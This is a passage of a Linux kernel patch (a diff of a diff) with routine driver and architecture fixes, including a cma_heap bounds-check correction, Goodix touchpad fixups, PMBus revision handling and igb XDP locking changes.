++		output-high;
++	};
++};
++
+ &gmac {
+ 	assigned-clocks = <&cru SCLK_RMII_SRC>;
+ 	assigned-clock-parents = <&clkin_gmac>;
+@@ -374,6 +390,7 @@ vdd_cpu_b: regulator@60 {
+ 
+ &i2s0 {
+ 	pinctrl-0 = <&i2s0_2ch_bus>;
++	pinctrl-1 = <&i2s0_2ch_bus_bclk_off>;
+ 	rockchip,playback-channels = <2>;
+ 	rockchip,capture-channels = <2>;
+ 	status = "okay";
+@@ -382,8 +399,8 @@ &i2s0 {
+ /*
+  * As Q7 does not specify neither a global nor a RX clock for I2S these
+  * signals are not used. Furthermore I2S0_LRCK_RX is used as GPIO.
+- * Therefore we have to redefine the i2s0_2ch_bus definition to prevent
+- * conflicts.
++ * Therefore we have to redefine the i2s0_2ch_bus and i2s0_2ch_bus_bclk_off
++ * definitions to prevent conflicts.
+  */
+ &i2s0_2ch_bus {
+ 	rockchip,pins =
+@@ -393,6 +410,14 @@ &i2s0_2ch_bus {
+ 		<3 RK_PD7 1 &pcfg_pull_none>;
+ };
+ 
++&i2s0_2ch_bus_bclk_off {
++	rockchip,pins =
++		<3 RK_PD0 RK_FUNC_GPIO &pcfg_pull_none>,
++		<3 RK_PD2 1 &pcfg_pull_none>,
++		<3 RK_PD3 1 &pcfg_pull_none>,
++		<3 RK_PD7 1 &pcfg_pull_none>;
++};
++
+ &io_domains {
+ 	status = "okay";
+ 	bt656-supply = <&vcc_1v8>;
+@@ -408,9 +433,14 @@ &pcie_clkreqn_cpm {
+ 
+ &pinctrl {
+ 	pinctrl-names = "default";
+-	pinctrl-0 = <&q7_thermal_pin>;
++	pinctrl-0 = <&q7_thermal_pin &bios_disable_override_hog_pin>;
+ 
+ 	gpios {
++		bios_disable_override_hog_pin: bios-disable-override-hog-pin {
++			rockchip,pins =
++				<3 RK_PD5 RK_FUNC_GPIO &pcfg_pull_down>;
++		};
++
+ 		q7_thermal_pin: q7-thermal-pin {
+ 			rockchip,pins =
+ 				<0 RK_PA3 RK_FUNC_GPIO &pcfg_pull_up>;
+diff --git a/arch/powerpc/kernel/setup-common.c b/arch/powerpc/kernel/setup-common.c
+index 59b4ac57bfaf7d..56f6b958926d7c 100644
+--- a/arch/powerpc/kernel/setup-common.c
++++ b/arch/powerpc/kernel/setup-common.c
+@@ -948,6 +948,7 @@ void __init setup_arch(char **cmdline_p)
+ 	mem_topology_setup();
+ 	/* Set max_mapnr before paging_init() */
+ 	set_max_mapnr(max_pfn);
++	high_memory = (void *)__va(max_low_pfn * PAGE_SIZE);
+ 
+ 	/*
+ 	 * Release secondary cpus out of their spinloops at 0x60 now that
+diff --git a/arch/powerpc/mm/mem.c b/arch/powerpc/mm/mem.c
+index c7599b1737099a..40f4a31f001c2d 100644
+--- a/arch/powerpc/mm/mem.c
++++ b/arch/powerpc/mm/mem.c
+@@ -287,8 +287,6 @@ void __init mem_init(void)
+ 	swiotlb_init(ppc_swiotlb_enable, ppc_swiotlb_flags);
+ #endif
+ 
+-	high_memory = (void *) __va(max_low_pfn * PAGE_SIZE);
+-
+ 	kasan_late_init();
+ 
+ 	memblock_free_all();
+diff --git a/drivers/cxl/cxlmem.h b/drivers/cxl/cxlmem.h
+index b58a5b782e5dcc..0be48441d0f295 100644
+--- a/drivers/cxl/cxlmem.h
++++ b/drivers/cxl/cxlmem.h
+@@ -293,7 +293,7 @@ enum cxl_opcode {
+ 		  0x3b, 0x3f, 0x17)
+ 
+ #define DEFINE_CXL_VENDOR_DEBUG_UUID                                           \
+-	UUID_INIT(0xe1819d9, 0x11a9, 0x400c, 0x81, 0x1f, 0xd6, 0x07, 0x19,     \
++	UUID_INIT(0x5e1819d9, 0x11a9, 0x400c, 0x81, 0x1f, 0xd6, 0x07, 0x19,     \
+ 		  0x40, 0x3d, 0x86)
+ 
+ struct cxl_mbox_get_supported_logs {
+diff --git a/drivers/dma-buf/heaps/cma_heap.c b/drivers/dma-buf/heaps/cma_heap.c
+index 28fb04eccdd0ca..ec2a2a1560a472 100644
+--- a/drivers/dma-buf/heaps/cma_heap.c
++++ b/drivers/dma-buf/heaps/cma_heap.c
+@@ -165,7 +165,7 @@ static vm_fault_t cma_heap_vm_fault(struct vm_fault *vmf)
+ 	struct vm_area_struct *vma = vmf->vma;
+ 	struct cma_heap_buffer *buffer = vma->vm_private_data;
+ 
+-	if (vmf->pgoff > buffer->pagecount)
++	if (vmf->pgoff >= buffer->pagecount)
+ 		return VM_FAULT_SIGBUS;
+ 
+ 	vmf->page = buffer->pages[vmf->pgoff];
+diff --git a/drivers/gpu/drm/amd/include/atomfirmware.h b/drivers/gpu/drm/amd/include/atomfirmware.h
+index 6ea596a8a03dfe..dea810c9b8fb1f 100644
+--- a/drivers/gpu/drm/amd/include/atomfirmware.h
++++ b/drivers/gpu/drm/amd/include/atomfirmware.h
+@@ -1005,7 +1005,7 @@ struct display_object_info_table_v1_4
+   uint16_t  supporteddevices;
+   uint8_t   number_of_path;
+   uint8_t   reserved;
+-  struct    atom_display_object_path_v2 display_path[8];   //the real number of this included in the structure is calculated by using the (whole structure size - the header size- number_of_path)/size of atom_display_object_path
++  struct    atom_display_object_path_v2 display_path[];   //the real number of this included in the structure is calculated by using the (whole structure size - the header size- number_of_path)/size of atom_display_object_path
+ };
+ 
+ struct display_object_info_table_v1_5 {
+@@ -1015,7 +1015,7 @@ struct display_object_info_table_v1_5 {
+ 	uint8_t reserved;
+ 	// the real number of this included in the structure is calculated by using the
+ 	// (whole structure size - the header size- number_of_path)/size of atom_display_object_path
+-	struct atom_display_object_path_v3 display_path[8];
++	struct atom_display_object_path_v3 display_path[];
+ };
+ 
+ /* 
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 039da0d1a613b7..5b2506c65e9520 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -208,6 +208,18 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_MATCH(DMI_BOARD_NAME, "KUN"),
+ 		},
+ 		.driver_data = (void *)&lcd1600x2560_rightside_up,
++	}, {    /* AYN Loki Max */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ayn"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "Loki Max"),
++		},
++		.driver_data = (void *)&lcd1080x1920_leftside_up,
++	}, {	/* AYN Loki Zero */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ayn"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "Loki Zero"),
++		},
++		.driver_data = (void *)&lcd1080x1920_leftside_up,
+ 	}, {	/* Chuwi HiBook (CWI514) */
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_VENDOR, "Hampoo"),
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+index fecdc7ea78ebdf..56df4c4a8a1a84 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+@@ -2603,9 +2603,9 @@ static void prepare_context_registration_info_v70(struct intel_context *ce,
+ 		ce->parallel.guc.wqi_tail = 0;
+ 		ce->parallel.guc.wqi_head = 0;
+ 
+-		wq_desc_offset = i915_ggtt_offset(ce->state) +
++		wq_desc_offset = (u64)i915_ggtt_offset(ce->state) +
+ 				 __get_parent_scratch_offset(ce);
+-		wq_base_offset = i915_ggtt_offset(ce->state) +
++		wq_base_offset = (u64)i915_ggtt_offset(ce->state) +
+ 				 __get_wq_offset(ce);
+ 		info->wq_desc_lo = lower_32_bits(wq_desc_offset);
+ 		info->wq_desc_hi = upper_32_bits(wq_desc_offset);
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_gpu.c b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+index dfd4eec217859e..c4ad70eb1d923f 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+@@ -99,7 +99,7 @@ static int zap_shader_load_mdt(struct msm_gpu *gpu, const char *fwname,
+ 		 * was a bad idea, and is only provided for backwards
+ 		 * compatibility for older targets.
+ 		 */
+-		return -ENODEV;
++		return -ENOENT;
+ 	}
+ 
+ 	if (IS_ERR(fw)) {
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 1395270a30cb0d..3359a24ca2419d 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -506,6 +506,8 @@
+ #define USB_DEVICE_ID_GENERAL_TOUCH_WIN8_PIT_E100 0xe100
+ 
+ #define I2C_VENDOR_ID_GOODIX		0x27c6
++#define I2C_DEVICE_ID_GOODIX_01E8	0x01e8
++#define I2C_DEVICE_ID_GOODIX_01E9	0x01e9
+ #define I2C_DEVICE_ID_GOODIX_01F0	0x01f0
+ 
+ #define USB_VENDOR_ID_GOODTOUCH		0x1aad
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 17efe6e2a1a44c..8ef41d6e71d421 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -1442,6 +1442,30 @@ static int mt_event(struct hid_device *hid, struct hid_field *field,
+ 	return 0;
+ }
+ 
++static __u8 *mt_report_fixup(struct hid_device *hdev, __u8 *rdesc,
++			     unsigned int *size)
++{
++	if (hdev->vendor == I2C_VENDOR_ID_GOODIX &&
++	    (hdev->product == I2C_DEVICE_ID_GOODIX_01E8 ||
++	     hdev->product == I2C_DEVICE_ID_GOODIX_01E9)) {
++		if (rdesc[607] == 0x15) {
++			rdesc[607] = 0x25;
++			dev_info(
++				&hdev->dev,
++				"GT7868Q report descriptor fixup is applied.\n");
++		} else {
++			dev_info(
++				&hdev->dev,
++				"The byte is not expected for fixing the report descriptor. \
++It's possible that the touchpad firmware is not suitable for applying the fix. \
++got: %x\n",
++				rdesc[607]);
++		}
++	}
++
++	return rdesc;
++}
++
+ static void mt_report(struct hid_device *hid, struct hid_report *report)
+ {
+ 	struct mt_device *td = hid_get_drvdata(hid);
+@@ -2038,6 +2062,14 @@ static const struct hid_device_id mt_devices[] = {
+ 		MT_BT_DEVICE(USB_VENDOR_ID_FRUCTEL,
+ 			USB_DEVICE_ID_GAMETEL_MT_MODE) },
+ 
++	/* Goodix GT7868Q devices */
++	{ .driver_data = MT_CLS_WIN_8_FORCE_MULTI_INPUT_NSMU,
++	  HID_DEVICE(BUS_I2C, HID_GROUP_ANY, I2C_VENDOR_ID_GOODIX,
++		     I2C_DEVICE_ID_GOODIX_01E8) },
++	{ .driver_data = MT_CLS_WIN_8_FORCE_MULTI_INPUT_NSMU,
++	  HID_DEVICE(BUS_I2C, HID_GROUP_ANY, I2C_VENDOR_ID_GOODIX,
++		     I2C_DEVICE_ID_GOODIX_01E8) },
++
+ 	/* GoodTouch panels */
+ 	{ .driver_data = MT_CLS_NSMU,
+ 		MT_USB_DEVICE(USB_VENDOR_ID_GOODTOUCH,
+@@ -2273,6 +2305,7 @@ static struct hid_driver mt_driver = {
+ 	.feature_mapping = mt_feature_mapping,
+ 	.usage_table = mt_grabbed_usages,
+ 	.event = mt_event,
++	.report_fixup = mt_report_fixup,
+ 	.report = mt_report,
+ #ifdef CONFIG_PM
+ 	.suspend = mt_suspend,
+diff --git a/drivers/hwmon/pmbus/pmbus.h b/drivers/hwmon/pmbus/pmbus.h
+index 10fb17879f8ed9..0bbb8ae9341c31 100644
+--- a/drivers/hwmon/pmbus/pmbus.h
++++ b/drivers/hwmon/pmbus/pmbus.h
+@@ -409,6 +409,12 @@ enum pmbus_sensor_classes {
+ enum pmbus_data_format { linear = 0, ieee754, direct, vid };
+ enum vrm_version { vr11 = 0, vr12, vr13, imvp9, amd625mv };
+ 
++/* PMBus revision identifiers */
++#define PMBUS_REV_10 0x00	/* PMBus revision 1.0 */
++#define PMBUS_REV_11 0x11	/* PMBus revision 1.1 */
++#define PMBUS_REV_12 0x22	/* PMBus revision 1.2 */
++#define PMBUS_REV_13 0x33	/* PMBus revision 1.3 */
++
+ struct pmbus_driver_info {
+ 	int pages;		/* Total number of pages */
+ 	u8 phases[PMBUS_PAGES];	/* Number of phases per page */
+diff --git a/drivers/hwmon/pmbus/pmbus_core.c b/drivers/hwmon/pmbus/pmbus_core.c
+index 7ec04934747e12..4b73c7b27e9aae 100644
+--- a/drivers/hwmon/pmbus/pmbus_core.c
++++ b/drivers/hwmon/pmbus/pmbus_core.c
+@@ -84,6 +84,8 @@ struct pmbus_data {
+ 
+ 	u32 flags;		/* from platform data */
+ 
++	u8 revision;	/* The PMBus revision the device is compliant with */
++
+ 	int exponent[PMBUS_PAGES];
+ 				/* linear mode: exponent for output voltages */
+ 
+@@ -1093,9 +1095,14 @@ static int pmbus_get_boolean(struct i2c_client *client, struct pmbus_boolean *b,
+ 
+ 	regval = status & mask;
+ 	if (regval) {
+-		ret = _pmbus_write_byte_data(client, page, reg, regval);
+-		if (ret)
+-			goto unlock;
++		if (data->revision >= PMBUS_REV_12) {
++			ret = _pmbus_write_byte_data(client, page, reg, regval);
++			if (ret)
++				goto unlock;
++		} else {
++			pmbus_clear_fault_page(client, page);
++		}
++
+ 	}
+ 	if (s1 && s2) {
+ 		s64 v1, v2;
+@@ -2639,6 +2646,10 @@ static int pmbus_init_common(struct i2c_client *client, struct pmbus_data *data,
+ 			data->flags |= PMBUS_WRITE_PROTECTED | PMBUS_SKIP_STATUS_CHECK;
+ 	}
+ 
++	ret = i2c_smbus_read_byte_data(client, PMBUS_REVISION);
++	if (ret >= 0)
++		data->revision = ret;
++
+ 	if (data->info->pages)
+ 		pmbus_clear_faults(client);
+ 	else
+diff --git a/drivers/input/mouse/synaptics.c b/drivers/input/mouse/synaptics.c
+index b6749af4626205..d8c90a23a10144 100644
+--- a/drivers/input/mouse/synaptics.c
++++ b/drivers/input/mouse/synaptics.c
+@@ -189,6 +189,7 @@ static const char * const smbus_pnp_ids[] = {
+ 	"LEN2054", /* E480 */
+ 	"LEN2055", /* E580 */
+ 	"LEN2068", /* T14 Gen 1 */
++	"SYN3015", /* HP EliteBook 840 G2 */
+ 	"SYN3052", /* HP EliteBook 840 G4 */
+ 	"SYN3221", /* HP 15-ay000 */
+ 	"SYN323d", /* HP Spectre X360 13-w013dx */
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index e9eb9554dd7bdc..bad238f69a7afd 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -627,6 +627,15 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		},
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
+ 	},
++	{
++		/* Fujitsu Lifebook E756 */
++		/* https://bugzilla.suse.com/show_bug.cgi?id=1229056 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "LIFEBOOK E756"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
++	},
+ 	{
+ 		/* Fujitsu Lifebook E5411 */
+ 		.matches = {
+diff --git a/drivers/input/touchscreen/ads7846.c b/drivers/input/touchscreen/ads7846.c
+index bed68a68f3303c..1f206c75c6cff7 100644
+--- a/drivers/input/touchscreen/ads7846.c
++++ b/drivers/input/touchscreen/ads7846.c
+@@ -810,7 +810,7 @@ static void ads7846_read_state(struct ads7846 *ts)
+ 		m = &ts->msg[msg_idx];
+ 		error = spi_sync(ts->spi, m);
+ 		if (error) {
+-			dev_err(&ts->spi->dev, "spi_sync --> %d\n", error);
++			dev_err_ratelimited(&ts->spi->dev, "spi_sync --> %d\n", error);
+ 			packet->ignore = true;
+ 			return;
+ 		}
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 696365f8f3b5fe..e0ffac93f900ee 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -2175,6 +2175,7 @@ static void dm_integrity_map_continue(struct dm_integrity_io *dio, bool from_map
+ 	struct bio *bio = dm_bio_from_per_bio_data(dio, sizeof(struct dm_integrity_io));
+ 	unsigned int journal_section, journal_entry;
+ 	unsigned int journal_read_pos;
++	sector_t recalc_sector;
+ 	struct completion read_comp;
+ 	bool discard_retried = false;
+ 	bool need_sync_io = ic->internal_hash && dio->op == REQ_OP_READ;
+@@ -2308,6 +2309,7 @@ static void dm_integrity_map_continue(struct dm_integrity_io *dio, bool from_map
+ 			goto lock_retry;
+ 		}
+ 	}
++	recalc_sector = le64_to_cpu(ic->sb->recalc_sector);
+ 	spin_unlock_irq(&ic->endio_wait.lock);
+ 
+ 	if (unlikely(journal_read_pos != NOT_FOUND)) {
+@@ -2362,7 +2364,7 @@ static void dm_integrity_map_continue(struct dm_integrity_io *dio, bool from_map
+ 	if (need_sync_io) {
+ 		wait_for_completion_io(&read_comp);
+ 		if (ic->sb->flags & cpu_to_le32(SB_FLAG_RECALCULATING) &&
+-		    dio->range.logical_sector + dio->range.n_sectors > le64_to_cpu(ic->sb->recalc_sector))
++		    dio->range.logical_sector + dio->range.n_sectors > recalc_sector)
+ 			goto skip_check;
+ 		if (ic->mode == 'B') {
+ 			if (!block_bitmap_op(ic, ic->recalc_bitmap, dio->range.logical_sector,
+diff --git a/drivers/misc/eeprom/digsy_mtc_eeprom.c b/drivers/misc/eeprom/digsy_mtc_eeprom.c
+index f1f766b709657b..4eddc5ba1af9c8 100644
+--- a/drivers/misc/eeprom/digsy_mtc_eeprom.c
++++ b/drivers/misc/eeprom/digsy_mtc_eeprom.c
+@@ -42,7 +42,7 @@ static void digsy_mtc_op_finish(void *p)
+ }
+ 
+ struct eeprom_93xx46_platform_data digsy_mtc_eeprom_data = {
+-	.flags		= EE_ADDR8,
++	.flags		= EE_ADDR8 | EE_SIZE1K,
+ 	.prepare	= digsy_mtc_op_prepare,
+ 	.finish		= digsy_mtc_op_finish,
+ };
+diff --git a/drivers/net/ethernet/faraday/ftgmac100.h b/drivers/net/ethernet/faraday/ftgmac100.h
+index 63b3e02fab162e..4968f6f0bdbc25 100644
+--- a/drivers/net/ethernet/faraday/ftgmac100.h
++++ b/drivers/net/ethernet/faraday/ftgmac100.h
+@@ -84,7 +84,7 @@
+ 			    FTGMAC100_INT_RPKT_BUF)
+ 
+ /* All the interrupts we care about */
+-#define FTGMAC100_INT_ALL (FTGMAC100_INT_RPKT_BUF  |  \
++#define FTGMAC100_INT_ALL (FTGMAC100_INT_RXTX  |  \
+ 			   FTGMAC100_INT_BAD)
+ 
+ /*
+diff --git a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+index 19506f2be4d401..6f5c22861dc9c2 100644
+--- a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
++++ b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+@@ -2275,12 +2275,12 @@ static netdev_tx_t
+ dpaa_start_xmit(struct sk_buff *skb, struct net_device *net_dev)
+ {
+ 	const int queue_mapping = skb_get_queue_mapping(skb);
+-	bool nonlinear = skb_is_nonlinear(skb);
+ 	struct rtnl_link_stats64 *percpu_stats;
+ 	struct dpaa_percpu_priv *percpu_priv;
+ 	struct netdev_queue *txq;
+ 	struct dpaa_priv *priv;
+ 	struct qm_fd fd;
++	bool nonlinear;
+ 	int offset = 0;
+ 	int err = 0;
+ 
+@@ -2290,6 +2290,13 @@ dpaa_start_xmit(struct sk_buff *skb, struct net_device *net_dev)
+ 
+ 	qm_fd_clear_fd(&fd);
+ 
++	/* Packet data is always read as 32-bit words, so zero out any part of
++	 * the skb which might be sent if we have to pad the packet
++	 */
++	if (__skb_put_padto(skb, ETH_ZLEN, false))
++		goto enomem;
++
++	nonlinear = skb_is_nonlinear(skb);
+ 	if (!nonlinear) {
+ 		/* We're going to store the skb backpointer at the beginning
+ 		 * of the data buffer, so we need a privately owned skb
+diff --git a/drivers/net/ethernet/intel/ice/ice_switch.c b/drivers/net/ethernet/intel/ice/ice_switch.c
+index 735f995a3a6879..dc4ce3bd412d2c 100644
+--- a/drivers/net/ethernet/intel/ice/ice_switch.c
++++ b/drivers/net/ethernet/intel/ice/ice_switch.c
+@@ -3061,7 +3061,7 @@ ice_add_update_vsi_list(struct ice_hw *hw,
+ 
+ 		/* A rule already exists with the new VSI being added */
+ 		if (test_bit(vsi_handle, m_entry->vsi_list_info->vsi_map))
+-			return 0;
++			return -EEXIST;
+ 
+ 		/* Update the previously created VSI list set with
+ 		 * the new VSI ID passed in
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index 76bd41058f3a9b..f2f719a952f8d5 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -34,6 +34,7 @@
+ #include <linux/bpf_trace.h>
+ #include <linux/pm_runtime.h>
+ #include <linux/etherdevice.h>
++#include <linux/lockdep.h>
+ #ifdef CONFIG_IGB_DCA
+ #include <linux/dca.h>
+ #endif
+@@ -2915,8 +2916,11 @@ static int igb_xdp(struct net_device *dev, struct netdev_bpf *xdp)
+ 	}
+ }
+ 
++/* This function assumes __netif_tx_lock is held by the caller. */
+ static void igb_xdp_ring_update_tail(struct igb_ring *ring)
+ {
++	lockdep_assert_held(&txring_txq(ring)->_xmit_lock);
++
+ 	/* Force memory writes to complete before letting h/w know there
+ 	 * are new descriptors to fetch.
+ 	 */
+@@ -3001,11 +3005,11 @@ static int igb_xdp_xmit(struct net_device *dev, int n,
+ 		nxmit++;
+ 	}
+ 
+-	__netif_tx_unlock(nq);
+-
+ 	if (unlikely(flags & XDP_XMIT_FLUSH))
+ 		igb_xdp_ring_update_tail(tx_ring);
+ 
++	__netif_tx_unlock(nq);
++
+ 	return nxmit;
+ }
+ 
+@@ -8829,12 +8833,14 @@ static void igb_put_rx_buffer(struct igb_ring *rx_ring,
+ 
+ static int igb_clean_rx_irq(struct igb_q_vector *q_vector, const int budget)
+ {
++	unsigned int total_bytes = 0, total_packets = 0;
+ 	struct igb_adapter *adapter = q_vector->adapter;
+ 	struct igb_ring *rx_ring = q_vector->rx.ring;
+-	struct sk_buff *skb = rx_ring->skb;
+-	unsigned int total_bytes = 0, total_packets = 0;
+ 	u16 cleaned_count = igb_desc_unused(rx_ring);
++	struct sk_buff *skb = rx_ring->skb;
++	int cpu = smp_processor_id();
+ 	unsigned int xdp_xmit = 0;
++	struct netdev_queue *nq;
+ 	struct xdp_buff xdp;
+ 	u32 frame_sz = 0;
+ 	int rx_buf_pgcnt;
+@@ -8962,7 +8968,10 @@ static int igb_clean_rx_irq(struct igb_q_vector *q_vector, const int budget)
+ 	if (xdp_xmit & IGB_XDP_TX) {
+ 		struct igb_ring *tx_ring = igb_xdp_tx_queue_mapping(adapter);
+ 
++		nq = txring_txq(tx_ring);
++		__netif_tx_lock(nq, cpu);
+ 		igb_xdp_ring_update_tail(tx_ring);
++		__netif_tx_unlock(nq);
+ 	}
+ 
+ 	u64_stats_update_begin(&rx_ring->rx_syncp);
+diff --git a/drivers/net/ethernet/jme.c b/drivers/net/ethernet/jme.c
+index 1732ec3c3dbdc4..a718207988f2c4 100644
+--- a/drivers/net/ethernet/jme.c
++++ b/drivers/net/ethernet/jme.c
+@@ -946,15 +946,13 @@ jme_udpsum(struct sk_buff *skb)
+ 	if (skb->protocol != htons(ETH_P_IP))
+ 		return csum;
+ 	skb_set_network_header(skb, ETH_HLEN);
+-	if ((ip_hdr(skb)->protocol != IPPROTO_UDP) ||
+-	    (skb->len < (ETH_HLEN +
+-			(ip_hdr(skb)->ihl << 2) +
+-			sizeof(struct udphdr)))) {
++
++	if (ip_hdr(skb)->protocol != IPPROTO_UDP ||
++	    skb->len < (ETH_HLEN + ip_hdrlen(skb) + sizeof(struct udphdr))) {
+ 		skb_reset_network_header(skb);
+ 		return csum;
+ 	}
+-	skb_set_transport_header(skb,
+-			ETH_HLEN + (ip_hdr(skb)->ihl << 2));
++	skb_set_transport_header(skb, ETH_HLEN + ip_hdrlen(skb));
+ 	csum = udp_hdr(skb)->check;
+ 	skb_reset_transport_header(skb);
+ 	skb_reset_network_header(skb);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index a3ae21398ca74e..fc0f3398a556bb 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -286,6 +286,21 @@ struct nix_mark_format {
+ 	u32 *cfg;
+ };
+ 
++/* smq(flush) to tl1 cir/pir info */
++struct nix_smq_tree_ctx {
++	u16 schq;
++	u64 cir_off;
++	u64 cir_val;
++	u64 pir_off;
++	u64 pir_val;
++};
++
++/* smq flush context */
++struct nix_smq_flush_ctx {
++	int smq;
++	struct nix_smq_tree_ctx smq_tree_ctx[NIX_TXSCH_LVL_CNT];
++};
++
+ struct npc_pkind {
+ 	struct rsrc_bmap rsrc;
+ 	u32	*pfchan_map;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index ef526408b0bd28..7ed0eb9bd4ed2f 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -2121,13 +2121,127 @@ int rvu_mbox_handler_nix_txsch_alloc(struct rvu *rvu,
+ 	return rc;
+ }
+ 
++static void nix_smq_flush_fill_ctx(struct rvu *rvu, int blkaddr, int smq,
++				   struct nix_smq_flush_ctx *smq_flush_ctx)
++{
++	struct nix_smq_tree_ctx *smq_tree_ctx;
++	u64 parent_off, regval;
++	u16 schq;
++	int lvl;
++
++	smq_flush_ctx->smq = smq;
++
++	schq = smq;
++	for (lvl = NIX_TXSCH_LVL_SMQ; lvl <= NIX_TXSCH_LVL_TL1; lvl++) {
++		smq_tree_ctx = &smq_flush_ctx->smq_tree_ctx[lvl];
++		smq_tree_ctx->schq = schq;
++		if (lvl == NIX_TXSCH_LVL_TL1) {
++			smq_tree_ctx->cir_off = NIX_AF_TL1X_CIR(schq);
++			smq_tree_ctx->pir_off = 0;
++			smq_tree_ctx->pir_val = 0;
++			parent_off = 0;
++		} else if (lvl == NIX_TXSCH_LVL_TL2) {
++			smq_tree_ctx->cir_off = NIX_AF_TL2X_CIR(schq);
++			smq_tree_ctx->pir_off = NIX_AF_TL2X_PIR(schq);
++			parent_off = NIX_AF_TL2X_PARENT(schq);
++		} else if (lvl == NIX_TXSCH_LVL_TL3) {
++			smq_tree_ctx->cir_off = NIX_AF_TL3X_CIR(schq);
++			smq_tree_ctx->pir_off = NIX_AF_TL3X_PIR(schq);
++			parent_off = NIX_AF_TL3X_PARENT(schq);
++		} else if (lvl == NIX_TXSCH_LVL_TL4) {
++			smq_tree_ctx->cir_off = NIX_AF_TL4X_CIR(schq);
++			smq_tree_ctx->pir_off = NIX_AF_TL4X_PIR(schq);
++			parent_off = NIX_AF_TL4X_PARENT(schq);
++		} else if (lvl == NIX_TXSCH_LVL_MDQ) {
++			smq_tree_ctx->cir_off = NIX_AF_MDQX_CIR(schq);
++			smq_tree_ctx->pir_off = NIX_AF_MDQX_PIR(schq);
++			parent_off = NIX_AF_MDQX_PARENT(schq);
++		}
++		/* save cir/pir register values */
++		smq_tree_ctx->cir_val = rvu_read64(rvu, blkaddr, smq_tree_ctx->cir_off);
++		if (smq_tree_ctx->pir_off)
++			smq_tree_ctx->pir_val = rvu_read64(rvu, blkaddr, smq_tree_ctx->pir_off);
++
++		/* get parent txsch node */
++		if (parent_off) {
++			regval = rvu_read64(rvu, blkaddr, parent_off);
++			schq = (regval >> 16) & 0x1FF;
++		}
++	}
++}
++
++static void nix_smq_flush_enadis_xoff(struct rvu *rvu, int blkaddr,
++				      struct nix_smq_flush_ctx *smq_flush_ctx, bool enable)
++{
++	struct nix_txsch *txsch;
++	struct nix_hw *nix_hw;
++	int tl2, tl2_schq;
++	u64 regoff;
++
++	nix_hw = get_nix_hw(rvu->hw, blkaddr);
++	if (!nix_hw)
++		return;
++
++	/* loop through all TL2s with matching PF_FUNC */
++	txsch = &nix_hw->txsch[NIX_TXSCH_LVL_TL2];
++	tl2_schq = smq_flush_ctx->smq_tree_ctx[NIX_TXSCH_LVL_TL2].schq;
++	for (tl2 = 0; tl2 < txsch->schq.max; tl2++) {
++		/* skip the smq(flush) TL2 */
++		if (tl2 == tl2_schq)
++			continue;
++		/* skip unused TL2s */
++		if (TXSCH_MAP_FLAGS(txsch->pfvf_map[tl2]) & NIX_TXSCHQ_FREE)
++			continue;
++		/* skip if PF_FUNC doesn't match */
++		if ((TXSCH_MAP_FUNC(txsch->pfvf_map[tl2]) & ~RVU_PFVF_FUNC_MASK) !=
++		    (TXSCH_MAP_FUNC(txsch->pfvf_map[tl2_schq] &
++				    ~RVU_PFVF_FUNC_MASK)))
++			continue;
++		/* enable/disable XOFF */
++		regoff = NIX_AF_TL2X_SW_XOFF(tl2);
++		if (enable)
++			rvu_write64(rvu, blkaddr, regoff, 0x1);
++		else
++			rvu_write64(rvu, blkaddr, regoff, 0x0);
++	}
++}
++
++static void nix_smq_flush_enadis_rate(struct rvu *rvu, int blkaddr,
++				      struct nix_smq_flush_ctx *smq_flush_ctx, bool enable)
